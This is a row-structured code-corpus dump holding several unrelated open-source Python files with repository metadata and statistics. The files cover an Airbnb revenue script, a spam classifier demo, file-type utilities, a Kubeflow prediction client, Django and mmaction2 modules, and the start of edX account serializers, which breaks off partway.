"MIT"
] | null | null | null |
import zipcodes
if __name__ == "__main__":
region_average_revenue(zipcodes.get_all_cape_cod_zip_codes)
| 33.6
| 80
| 0.733631
|
import zipcodes
import listings
import bnbcalendar
import finance
from pprint import pprint
def region_average_revenue(zipcodes_func, adults=16, state="MA"):
rooms = listings.get_all_listings(zipcodes_func, adults=adults, state=state)
#rooms = ["4914702", "16042826"]
for room in rooms:
print("Getting calendar for {}".format(room))
calendar = bnbcalendar.get_calendar_for_next_year(room, adults=adults-3)
total_revenue = finance.calculate_total_revenue(calendar)
print("listing {} revenue {}".format(room, total_revenue))
if __name__ == "__main__":
region_average_revenue(zipcodes.get_all_cape_cod_zip_codes)
| 0
| 0
| 0
| 0
| 0
| 455
| 0
| -12
| 111
|
2b4944225389f356c9da74143b2cea6864e7e5f4
| 2,458
|
py
|
Python
|
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
#
# demo_spam_classifier.py
#
# Multinomial Naive Bays Classifier.
#
# Based-on:
#
# https://www.udemy.com/data-science-and-machine-learning-with-python-hands-on/
# http://blog.datumbox.com/machine-learning-tutorial-the-naive-bayes-text-classifier/
#
from pandas import DataFrame
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
'''
Convenience functions to read the emails and store their messages and
classes in a pandas dataframe.
'''
'''
Read the data and store it in a pandas dataframe.
'''
data = DataFrame({'message': [], 'class': []})
data = data.append(dataFrameFromDirectory('../datasets/emails/ham', 'ham'))
data = data.append(dataFrameFromDirectory('../datasets/emails/spam', 'spam'))
'''
We pass an array of messages to vectorizer.fit_transform(), it will convert
each word to a global token and count the occurences across all emails.
'''
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(data['message'].values)
'''
Now we train a Multinomial Naive Bayes Classifier using the frequencies
obtained from last step. We'll use this variant of the algorithm because
our premise is that spams tend to contain certain words that can easily
identify the nefarious purpose of them.
'''
classifier = MultinomialNB()
targets = data['class'].values
classifier.fit(counts, targets)
'''
Run some examples to test the classifier.
'''
examples = ['Free Viagra now!!!', "Hi Bob, how about a game of golf tomorrow?", "Luke... I'm your father."]
example_counts = vectorizer.transform(examples)
predictions = classifier.predict(example_counts)
print(predictions)
| 27.931818
| 107
| 0.684703
|
#
# demo_spam_classifier.py
#
# Multinomial Naive Bays Classifier.
#
# Based-on:
#
# https://www.udemy.com/data-science-and-machine-learning-with-python-hands-on/
# http://blog.datumbox.com/machine-learning-tutorial-the-naive-bayes-text-classifier/
#
import os
import io
import numpy
from pandas import DataFrame
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
'''
Convenience functions to read the emails and store their messages and
classes in a pandas dataframe.
'''
def readFiles(path):
for root, dirnames, filenames in os.walk(path):
for filename in filenames:
path = os.path.join(root, filename)
inBody = False
lines = []
f = io.open(path, 'r', encoding='latin1')
for line in f:
if inBody:
lines.append(line)
elif line == '\n':
inBody = True
f.close()
message = '\n'.join(lines)
yield path, message
def dataFrameFromDirectory(path, classification):
rows = []
index = []
for filename, message in readFiles(path):
rows.append({'message': message, 'class': classification})
index.append(filename)
return DataFrame(rows, index=index)
'''
Read the data and store it in a pandas dataframe.
'''
data = DataFrame({'message': [], 'class': []})
data = data.append(dataFrameFromDirectory('../datasets/emails/ham', 'ham'))
data = data.append(dataFrameFromDirectory('../datasets/emails/spam', 'spam'))
'''
We pass an array of messages to vectorizer.fit_transform(), it will convert
each word to a global token and count the occurences across all emails.
'''
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(data['message'].values)
'''
Now we train a Multinomial Naive Bayes Classifier using the frequencies
obtained from last step. We'll use this variant of the algorithm because
our premise is that spams tend to contain certain words that can easily
identify the nefarious purpose of them.
'''
classifier = MultinomialNB()
targets = data['class'].values
classifier.fit(counts, targets)
'''
Run some examples to test the classifier.
'''
examples = ['Free Viagra now!!!', "Hi Bob, how about a game of golf tomorrow?", "Luke... I'm your father."]
example_counts = vectorizer.transform(examples)
predictions = classifier.predict(example_counts)
print(predictions)
| 0
| 0
| 0
| 0
| 494
| 241
| 0
| -33
| 113
|
e5ab48881e462aa904536ebf91d486c500e7719a
| 115
|
py
|
Python
|
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | 1
|
2020-06-26T12:40:38.000Z
|
2020-06-26T12:40:38.000Z
|
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | null | null | null |
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | 1
|
2021-10-05T10:29:19.000Z
|
2021-10-05T10:29:19.000Z
|
ports = [80, 433, 8080, 8000]
| 16.428571
| 34
| 0.652174
|
ports = [80, 433, 8080, 8000]
def test_connections(connections):
for c in connections:
print(c.port)
| 0
| 0
| 0
| 0
| 0
| 61
| 0
| 0
| 23
|
3f2201b86a9fcb9ecd7c3f12b0c04d9a9eeca535
| 6,660
|
py
|
Python
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 2
|
2020-09-28T10:12:28.000Z
|
2021-01-15T11:16:44.000Z
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 28
|
2020-11-13T01:39:37.000Z
|
2022-03-28T20:14:50.000Z
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 6
|
2020-11-18T00:16:18.000Z
|
2021-09-01T09:01:11.000Z
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/commoncode for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import os
from datetime import datetime
from commoncode.system import on_posix
"""
Low level file type utilities, essentially a wrapper around os.path and stat.
"""
def is_link(location):
"""
Return True if `location` is a symbolic link.
"""
return location and os.path.islink(location)
def is_file(location, follow_symlinks=False):
"""
Return True if `location` is a file.
"""
_is_file = location and os.path.isfile(location)
if follow_symlinks:
return _is_file
return _is_file and not is_link(location) and not is_broken_link(location)
def is_dir(location, follow_symlinks=False):
"""
Return True if `location` is a directory.
"""
_is_dir = location and os.path.isdir(location) and not is_file(location)
if follow_symlinks:
return _is_dir
return _is_dir and not is_link(location) and not is_broken_link(location)
def is_regular(location):
"""
Return True if `location` is regular. A regular location is a file or a
dir and not a special file or symlink.
"""
return location and (is_file(location) or is_dir(location))
def is_special(location):
"""
Return True if `location` is a special file . A special file is not a
regular file, i.e. anything such as a broken link, block file, fifo,
socket, character device or else.
"""
return not is_regular(location)
def is_broken_link(location):
"""
Return True if `location` is a broken link.
"""
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
target = get_link_target(location)
target_loc = os.path.join(os.path.dirname(location), target)
return target and not os.path.exists(target_loc)
def get_link_target(location):
"""
Return the link target for `location` if this is a Link or an empty
string.
"""
target = ''
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
try:
# return false on OSes not supporting links
target = os.readlink(location)
except UnicodeEncodeError:
# location is unicode but readlink can fail in some cases
pass
return target
# Map of type checker function -> short type code
# The order of types check matters: link -> file -> directory -> special
TYPES = dict([
(is_link, ('l', 'link',)),
(is_file, ('f', 'file',)),
(is_dir, ('d', 'directory',)),
(is_special, ('s', 'special',))
])
def get_type(location, short=True):
"""
Return the type of the `location` or None if it does not exist.
Return the short form (single character) or long form if short=False
"""
if location:
for type_checker in TYPES:
tc = type_checker(location)
if tc:
short_form, long_form = TYPES[type_checker]
return short and short_form or long_form
def is_readable(location):
"""
Return True if the file at location has readable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.X_OK)
else:
return os.access(location, os.R_OK)
def is_writable(location):
"""
Return True if the file at location has writeable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.R_OK | os.W_OK)
def is_executable(location):
"""
Return True if the file at location has executable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.X_OK)
def is_rwx(location):
"""
Return True if the file at location has read, write and executable
permission set. Does not follow links.
"""
return is_readable(location) and is_writable(location) and is_executable(location)
def get_last_modified_date(location):
"""
Return the last modified date stamp of a file as YYYYMMDD format. The date
of non-files (dir, links, special) is always an empty string.
"""
yyyymmdd = ''
if is_file(location):
utc_date = datetime.isoformat(
datetime.utcfromtimestamp(os.path.getmtime(location))
)
yyyymmdd = utc_date[:10]
return yyyymmdd
counting_functions = {
'file_count': lambda _: 1,
'file_size': os.path.getsize,
}
def get_file_count(location):
"""
Return the cumulative number of files in the directory tree at `location`
or 1 if `location` is a file. Only regular files are counted. Everything
else has a zero size.
"""
return counter(location, 'file_count')
def get_size(location):
"""
Return the size in bytes of a file at `location` or if `location` is a
directory, the cumulative size of all files in this directory tree. Only
regular files have a size. Everything else has a zero size.
"""
return counter(location, 'file_size')
| 29.469027
| 86
| 0.666066
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/commoncode for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import os
from datetime import datetime
from commoncode.system import on_posix
from commoncode.functional import memoize
"""
Low level file type utilities, essentially a wrapper around os.path and stat.
"""
def is_link(location):
"""
Return True if `location` is a symbolic link.
"""
return location and os.path.islink(location)
def is_file(location, follow_symlinks=False):
"""
Return True if `location` is a file.
"""
_is_file = location and os.path.isfile(location)
if follow_symlinks:
return _is_file
return _is_file and not is_link(location) and not is_broken_link(location)
def is_dir(location, follow_symlinks=False):
"""
Return True if `location` is a directory.
"""
_is_dir = location and os.path.isdir(location) and not is_file(location)
if follow_symlinks:
return _is_dir
return _is_dir and not is_link(location) and not is_broken_link(location)
def is_regular(location):
"""
Return True if `location` is regular. A regular location is a file or a
dir and not a special file or symlink.
"""
return location and (is_file(location) or is_dir(location))
def is_special(location):
"""
Return True if `location` is a special file . A special file is not a
regular file, i.e. anything such as a broken link, block file, fifo,
socket, character device or else.
"""
return not is_regular(location)
def is_broken_link(location):
"""
Return True if `location` is a broken link.
"""
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
target = get_link_target(location)
target_loc = os.path.join(os.path.dirname(location), target)
return target and not os.path.exists(target_loc)
def get_link_target(location):
"""
Return the link target for `location` if this is a Link or an empty
string.
"""
target = ''
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
try:
# return false on OSes not supporting links
target = os.readlink(location)
except UnicodeEncodeError:
# location is unicode but readlink can fail in some cases
pass
return target
# Map of type checker function -> short type code
# The order of types check matters: link -> file -> directory -> special
TYPES = dict([
(is_link, ('l', 'link',)),
(is_file, ('f', 'file',)),
(is_dir, ('d', 'directory',)),
(is_special, ('s', 'special',))
])
def get_type(location, short=True):
"""
Return the type of the `location` or None if it does not exist.
Return the short form (single character) or long form if short=False
"""
if location:
for type_checker in TYPES:
tc = type_checker(location)
if tc:
short_form, long_form = TYPES[type_checker]
return short and short_form or long_form
def is_readable(location):
"""
Return True if the file at location has readable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.X_OK)
else:
return os.access(location, os.R_OK)
def is_writable(location):
"""
Return True if the file at location has writeable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.R_OK | os.W_OK)
def is_executable(location):
"""
Return True if the file at location has executable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.X_OK)
def is_rwx(location):
"""
Return True if the file at location has read, write and executable
permission set. Does not follow links.
"""
return is_readable(location) and is_writable(location) and is_executable(location)
def get_last_modified_date(location):
"""
Return the last modified date stamp of a file as YYYYMMDD format. The date
of non-files (dir, links, special) is always an empty string.
"""
yyyymmdd = ''
if is_file(location):
utc_date = datetime.isoformat(
datetime.utcfromtimestamp(os.path.getmtime(location))
)
yyyymmdd = utc_date[:10]
return yyyymmdd
counting_functions = {
'file_count': lambda _: 1,
'file_size': os.path.getsize,
}
@memoize
def counter(location, counting_function):
"""
Return a count for a single file or a cumulative count for a directory
tree at `location`.
Get a callable from the counting_functions registry using the
`counting_function` string. Call this callable with a `location` argument
to determine the count value for a single file. This allow memoization
with hashable arguments.
Only regular files and directories have a count. The count for a directory
is the recursive count sum of the directory file and directory
descendants.
Any other file type such as a special file or link has a zero size. Does
not follow links.
"""
if not (is_file(location) or is_dir(location)):
return 0
count = 0
if is_file(location):
count_fun = counting_functions[counting_function]
return count_fun(location)
elif is_dir(location):
count += sum(counter(os.path.join(location, p), counting_function)
for p in os.listdir(location))
return count
def get_file_count(location):
"""
Return the cumulative number of files in the directory tree at `location`
or 1 if `location` is a file. Only regular files are counted. Everything
else has a zero size.
"""
return counter(location, 'file_count')
def get_size(location):
"""
Return the size in bytes of a file at `location` or if `location` is a
directory, the cumulative size of all files in this directory tree. Only
regular files have a size. Everything else has a zero size.
"""
return counter(location, 'file_size')
| 0
| 1,031
| 0
| 0
| 0
| 0
| 0
| 20
| 45
|
05aeadad29492f4792dc64b4e5f1e4699b3a1866
| 1,522
|
py
|
Python
|
object_detection/serving_script/predict.py
|
qq2016/kubeflow_learning
|
930706686108f997aab42ccf2fe455dcf09a4afc
|
[
"Apache-2.0"
] | 1,165
|
2018-03-01T01:47:14.000Z
|
2022-03-31T08:35:00.000Z
|
object_detection/serving_script/predict.py
|
arki1/examples
|
c93b792d67c8c52bc91d4ccf5fbaead4e2324331
|
[
"Apache-2.0"
] | 929
|
2018-02-04T18:20:16.000Z
|
2022-03-31T18:20:43.000Z
|
object_detection/serving_script/predict.py
|
arki1/examples
|
c93b792d67c8c52bc91d4ccf5fbaead4e2324331
|
[
"Apache-2.0"
] | 687
|
2018-02-01T21:35:30.000Z
|
2022-03-29T07:47:47.000Z
|
""" Script to send prediction request.
Usage:
python predict.py --url=YOUR_KF_HOST/models/coco --input_image=YOUR_LOCAL_IMAGE
--output_image=OUTPUT_IMAGE_NAME.
This will save the prediction result as OUTPUT_IMAGE_NAME.
The output image is the input image with the detected bounding boxes.
"""
WIDTH = 1024
HEIGHT = 768
if __name__ == '__main__':
main()
| 27.178571
| 81
| 0.729304
|
""" Script to send prediction request.
Usage:
python predict.py --url=YOUR_KF_HOST/models/coco --input_image=YOUR_LOCAL_IMAGE
--output_image=OUTPUT_IMAGE_NAME.
This will save the prediction result as OUTPUT_IMAGE_NAME.
The output image is the input image with the detected bounding boxes.
"""
import argparse
import json
import requests
import numpy as np
from PIL import Image
import visualization_utils as vis_util
WIDTH = 1024
HEIGHT = 768
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--url", help='The url to send the request')
parser.add_argument("--input_image", default='image1.jpg')
parser.add_argument("--output_image", default='output.jpg')
args = parser.parse_args()
img = Image.open(args.input_image)
img = img.resize((WIDTH, HEIGHT), Image.ANTIALIAS)
img_np = np.array(img)
res = requests.post(
args.url,
data=json.dumps({"instances": [{"inputs": img_np.tolist()}]}))
if res.status_code != 200:
print('Failed: {}'.format(res.text))
return
output_dict = json.loads(res.text).get('predictions')[0]
vis_util.visualize_boxes_and_labels_on_image_array(
img_np,
np.array(output_dict['detection_boxes']),
map(int, output_dict['detection_classes']),
output_dict['detection_scores'],
{},
instance_masks=output_dict.get('detection_masks'),
use_normalized_coordinates=True,
line_thickness=8)
output_image = Image.fromarray(img_np)
output_image.save(args.output_image)
if __name__ == '__main__':
main()
| 0
| 0
| 0
| 0
| 0
| 1,009
| 0
| -8
| 156
|
835a69e7ee6ae96c62b6be6b24e176d61f9beb24
| 151
|
py
|
Python
|
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://0.0.0.0:8000')
print(browser.title)
assert 'Django' in browser.title
| 21.571429
| 34
| 0.761589
|
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://0.0.0.0:8000')
print(browser.title)
assert 'Django' in browser.title
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
a72428b374da27389d79bf99ef277a86b1fa5dd6
| 509
|
py
|
Python
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 843
|
2016-02-09T13:00:37.000Z
|
2022-03-20T19:17:06.000Z
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 10,187
|
2016-02-05T23:51:05.000Z
|
2022-03-31T15:24:44.000Z
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 551
|
2016-02-08T20:32:16.000Z
|
2022-03-15T16:49:24.000Z
|
# Generated by Django 2.2.13 on 2020-07-23 16:13
| 25.45
| 61
| 0.707269
|
# Generated by Django 2.2.13 on 2020-07-23 16:13
from django.db import migrations
def create_waffle_switch(apps, schema_editor):
Switch = apps.get_model('waffle', 'Switch')
Switch.objects.create(
name='use-bigquery-for-download-stats-cron',
active=False,
note='Use BigQuery in download stats cron tasks',
)
class Migration(migrations.Migration):
dependencies = [('stats', '0004_delete_updatecount')]
operations = [migrations.RunPython(create_waffle_switch)]
| 0
| 0
| 0
| 139
| 0
| 239
| 0
| 11
| 69
|
800e3537aea3f08140b4b85867fd724bf0b52669
| 1,055
|
py
|
Python
|
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) OpenMMLab. All rights reserved.
from .base import BaseWeightedLoss
from .binary_logistic_regression_loss import BinaryLogisticRegressionLoss
from .bmn_loss import BMNLoss
from .cross_entropy_loss import BCELossWithLogits, CrossEntropyLoss
from .hvu_loss import HVULoss
from .nll_loss import NLLLoss
from .ohem_hinge_loss import OHEMHingeLoss
from .ssn_loss import SSNLoss
from .slowfast_selfsupervised_loss import SlowFastSelfSupervisedLoss, ContrastiveLoss, SingleInstanceContrastiveLoss, SingleInstanceContrastiveLossv2
from .multiple_contrastive_loss import MultipleContrastiveLoss, MultipleContrastiveSingleInstanceLoss
from .moco_loss import MocoLoss
__all__ = [
'BaseWeightedLoss', 'CrossEntropyLoss', 'NLLLoss', 'BCELossWithLogits',
'BinaryLogisticRegressionLoss', 'BMNLoss', 'OHEMHingeLoss', 'SSNLoss',
'HVULoss', 'SlowFastSelfSupervisedLoss', 'MultipleContrastiveLoss',
'ContrastiveLoss', 'MocoLoss', 'SingleInstanceContrastiveLoss', 'MultipleContrastiveSingleInstanceLoss', 'SingleInstanceContrastiveLossv2'
]
| 50.238095
| 149
| 0.842654
|
# Copyright (c) OpenMMLab. All rights reserved.
from .base import BaseWeightedLoss
from .binary_logistic_regression_loss import BinaryLogisticRegressionLoss
from .bmn_loss import BMNLoss
from .cross_entropy_loss import BCELossWithLogits, CrossEntropyLoss
from .hvu_loss import HVULoss
from .nll_loss import NLLLoss
from .ohem_hinge_loss import OHEMHingeLoss
from .ssn_loss import SSNLoss
from .slowfast_selfsupervised_loss import SlowFastSelfSupervisedLoss, ContrastiveLoss, SingleInstanceContrastiveLoss, SingleInstanceContrastiveLossv2
from .multiple_contrastive_loss import MultipleContrastiveLoss, MultipleContrastiveSingleInstanceLoss
from .moco_loss import MocoLoss
__all__ = [
'BaseWeightedLoss', 'CrossEntropyLoss', 'NLLLoss', 'BCELossWithLogits',
'BinaryLogisticRegressionLoss', 'BMNLoss', 'OHEMHingeLoss', 'SSNLoss',
'HVULoss', 'SlowFastSelfSupervisedLoss', 'MultipleContrastiveLoss',
'ContrastiveLoss', 'MocoLoss', 'SingleInstanceContrastiveLoss', 'MultipleContrastiveSingleInstanceLoss', 'SingleInstanceContrastiveLossv2'
]
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
77e0586d04fc6b5bd498ff7eda396fdc0f889dc1
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/3a/e8/d9/6b866f26f3d0047a518cb59b619be509f29a97d30cbaa9657343abd771
| 96
| 96
| 0.895833
|
/home/runner/.cache/pip/pool/3a/e8/d9/6b866f26f3d0047a518cb59b619be509f29a97d30cbaa9657343abd771
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b7060bcb1857418d2ea9deaaa1621e5bdb64a900
| 25,094
|
py
|
Python
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 3
|
2021-12-15T04:58:18.000Z
|
2022-02-06T12:15:37.000Z
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | null | null | null |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 1
|
2019-01-02T14:38:50.000Z
|
2019-01-02T14:38:50.000Z
|
"""
Django REST Framework serializers for the User API Accounts sub-application
"""
import json
import logging
from django.conf import settings
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api.models import UserPreference
from . import (ACCOUNT_VISIBILITY_PREF_KEY, ALL_USERS_VISIBILITY, CUSTOM_VISIBILITY, PRIVATE_VISIBILITY, VISIBILITY_PREFIX)
PROFILE_IMAGE_KEY_PREFIX = 'image_url'
LOGGER = logging.getLogger(__name__)
def get_extended_profile(user_profile):
"""
Returns the extended user profile fields stored in user_profile.meta
"""
# pick the keys from the site configuration
extended_profile_field_names = configuration_helpers.get_value('extended_profile_fields', [])
try:
extended_profile_fields_data = json.loads(user_profile.meta)
except ValueError:
extended_profile_fields_data = {}
extended_profile = []
for field_name in extended_profile_field_names:
extended_profile.append({
"field_name": field_name,
"field_value": extended_profile_fields_data.get(field_name, "")
})
return extended_profile
def get_profile_visibility(user_profile, user, configuration):
"""
Returns the visibility level for the specified user profile.
"""
if user_profile.requires_parental_consent():
return PRIVATE_VISIBILITY
# Calling UserPreference directly because the requesting user may be different from existing_user
# (and does not have to be is_staff).
profile_privacy = UserPreference.get_value(user, ACCOUNT_VISIBILITY_PREF_KEY)
if profile_privacy:
return profile_privacy
else:
return configuration.get('default_visibility')
def _visible_fields(user_profile, user, configuration=None):
"""
Return what fields should be visible based on user's preferences
:param user_profile: User profile object
:param user: User object
:param configuration: A visibility configuration dictionary.
:return: whitelist List of fields to be shown
"""
if not configuration:
configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
profile_visibility = get_profile_visibility(user_profile, user, configuration)
if profile_visibility == ALL_USERS_VISIBILITY:
return configuration.get('bulk_shareable_fields')
elif profile_visibility == CUSTOM_VISIBILITY:
return _visible_fields_from_custom_preferences(user, configuration)
else:
return configuration.get('public_fields')
def _visible_fields_from_custom_preferences(user, configuration):
"""
Returns all fields that are marked to be shared with other users in the
given user's preferences. Includes fields that are always public.
"""
preferences = UserPreference.get_all_preferences(user)
fields_shared_with_all_users = [
field_name for field_name in configuration.get('custom_shareable_fields')
if preferences.get(f'{VISIBILITY_PREFIX}{field_name}') == 'all_users'
]
return set(fields_shared_with_all_users + configuration.get('public_fields'))
| 39.64297
| 124
| 0.676895
|
"""
Django REST Framework serializers for the User API Accounts sub-application
"""
import json
import logging
import re
from django.conf import settings
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core.exceptions import ObjectDoesNotExist
from django.urls import reverse
from rest_framework import serializers
from edx_name_affirmation.toggles import is_verified_name_enabled
from common.djangoapps.student.models import (
LanguageProficiency,
PendingNameChange,
SocialLink,
UserPasswordToggleHistory,
UserProfile
)
from lms.djangoapps.badges.utils import badges_enabled
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api import errors
from openedx.core.djangoapps.user_api.accounts.utils import is_secondary_email_feature_enabled
from openedx.core.djangoapps.user_api.models import RetirementState, UserPreference, UserRetirementStatus
from openedx.core.djangoapps.user_api.serializers import ReadOnlyFieldsSerializerMixin
from openedx.core.djangoapps.user_authn.views.registration_form import contains_html, contains_url
from . import (
ACCOUNT_VISIBILITY_PREF_KEY,
ALL_USERS_VISIBILITY,
BIO_MAX_LENGTH,
CUSTOM_VISIBILITY,
NAME_MIN_LENGTH,
PRIVATE_VISIBILITY,
VISIBILITY_PREFIX
)
from .image_helpers import get_profile_image_urls_for_user
from .utils import format_social_link, validate_social_link
PROFILE_IMAGE_KEY_PREFIX = 'image_url'
LOGGER = logging.getLogger(__name__)
class PhoneNumberSerializer(serializers.BaseSerializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class to serialize phone number into a digit only representation
"""
def to_internal_value(self, data):
"""Remove all non numeric characters in phone number"""
return re.sub("[^0-9]", "", data) or None
class LanguageProficiencySerializer(serializers.ModelSerializer):
"""
Class that serializes the LanguageProficiency model for account
information.
"""
class Meta:
model = LanguageProficiency
fields = ("code",)
def get_identity(self, data):
"""
This is used in bulk updates to determine the identity of an object.
The default is to use the id of an object, but we want to override that
and consider the language code to be the canonical identity of a
LanguageProficiency model.
"""
try:
return data.get('code', None)
except AttributeError:
return None
class SocialLinkSerializer(serializers.ModelSerializer):
"""
Class that serializes the SocialLink model for the UserProfile object.
"""
class Meta:
model = SocialLink
fields = ("platform", "social_link")
def validate_platform(self, platform):
"""
Validate that the platform value is one of (facebook, twitter or linkedin)
"""
valid_platforms = ["facebook", "twitter", "linkedin"]
if platform not in valid_platforms:
raise serializers.ValidationError(
"The social platform must be facebook, twitter or linkedin"
)
return platform
class UserReadOnlySerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class that serializes the User model and UserProfile model together.
"""
def __init__(self, *args, **kwargs):
# Don't pass the 'configuration' arg up to the superclass
self.configuration = kwargs.pop('configuration', None)
if not self.configuration:
self.configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
# Don't pass the 'custom_fields' arg up to the superclass
self.custom_fields = kwargs.pop('custom_fields', [])
super().__init__(*args, **kwargs)
def to_representation(self, user): # lint-amnesty, pylint: disable=arguments-differ
"""
Overwrite to_native to handle custom logic since we are serializing three models as one here
:param user: User object
:return: Dict serialized account
"""
try:
user_profile = user.profile
except ObjectDoesNotExist:
user_profile = None
LOGGER.warning("user profile for the user [%s] does not exist", user.username)
try:
account_recovery = user.account_recovery
except ObjectDoesNotExist:
account_recovery = None
try:
activation_key = user.registration.activation_key
except ObjectDoesNotExist:
activation_key = None
accomplishments_shared = badges_enabled()
data = {
"username": user.username,
"url": self.context.get('request').build_absolute_uri(
reverse('accounts_api', kwargs={'username': user.username})
